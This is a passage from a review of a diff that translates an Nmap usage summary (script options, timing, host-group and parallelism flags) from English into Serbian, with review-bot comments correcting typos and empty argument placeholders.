both** +**nmap --script-help="default and safe" --> One u obe** **nmap --script-help="(default or safe or intrusive) and not http-\*"** 
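Review bot: "65,335" appears twice in the translated `-p` paragraph ("svih 65,335 portova", "od 1 do 65,335") and is wrong in the English source as well; the port range is 1 to 65535, so write 65,535 in both places. Likewise "echo replay" in the `-PE, -PP, -PM` item should be "echo reply". The hunk also removes the `{% embed url="https://websec.nl/" %}` block and the blank lines around it at the top of nmap-summary-esp.md; that is a content change rather than a translation, so confirm it is intentional or restore it.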
@@ -100,135 +94,135 @@ To search for scripts: --script-help __|__|__|__|all[,...] ---script-trace ---> Provides info on how the script is progressing +--script-trace ---> Pruža informacije o tome kako skripta napreduje --script-updatedb -**To use a script, just type: nmap --script Script_Name target** --> When using the script, both the script and scanner will execute, so scanner options can also be added. We can add **"safe=1"** to execute only safe ones. +**Da biste koristili skriptu, jednostavno otkucajte: nmap --script Script_Name target** --> Kada koristite skriptu, i skripta i skener će se izvršiti, tako da se opcije skenera takođe mogu dodati. Možemo dodati **"safe=1"** da bismo izvršili samo sigurne. -**Time Control** +**Kontrola vremena** -**Nmap can modify time in seconds, minutes, ms:** --host-timeout arguments 900000ms, 900, 900s, and 15m all do the same thing. +**Nmap može modifikovati vreme u sekundama, minutima, ms:** --host-timeout argumenti 900000ms, 900, 900s, i 15m svi rade isto. -Nmap divides the total number of hosts to scan into groups and analyzes these groups in blocks, so it doesn't move to the next block until all have been analyzed (and the user doesn't receive any updates until the block has been analyzed). This way, it's more optimal for Nmap to use large groups. By default in class C, it uses 256. +Nmap deli ukupan broj hostova za skeniranje u grupe i analizira te grupe u blokovima, tako da ne prelazi na sledeći blok dok svi nisu analizirani (i korisnik ne prima nikakve ažuriranja dok blok nije analiziran). Na ovaj način, Nmap je optimalniji kada koristi velike grupe. Podrazumevano u klasi C, koristi 256. 
-This can be changed with **--min-hostgroup** _****_**;** **--max-hostgroup** _****_ (Adjust parallel scan group sizes) +Ovo se može promeniti sa **--min-hostgroup** _****_**;** **--max-hostgroup** _****_ (Prilagodite veličine paralelnih skeniranja) -You can control the number of parallel scanners but it's better not to (Nmap already incorporates automatic control based on network status): **--min-parallelism** _****_**;** **--max-parallelism** _****_ +Možete kontrolisati broj paralelnih skenera, ali je bolje ne (Nmap već uključuje automatsku kontrolu zasnovanu na statusu mreže): **--min-parallelism** _****_**;** **--max-parallelism** _****_ -We can modify the RTT timeout, but it's usually not necessary: **--min-rtt-timeout** _**
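Review bot: the `--min-hostgroup _****_` / `--max-hostgroup _****_` and `--min-parallelism _****_` / `--max-parallelism _****_` placeholders are empty in both the English and the translated lines, so the reader cannot tell what argument the flags take; since these lines are being rewritten anyway, restore the argument names, e.g. `--min-hostgroup <numhosts>; --max-hostgroup <numhosts>` and `--min-parallelism <numprobes>; --max-parallelism <numprobes>`, matching the Nmap reference guide. Minor: "(Prilagodite veličine paralelnih skeniranja)" drops "group" from "Adjust parallel scan group sizes"; "veličine grupa paralelnog skeniranja" keeps the meaning.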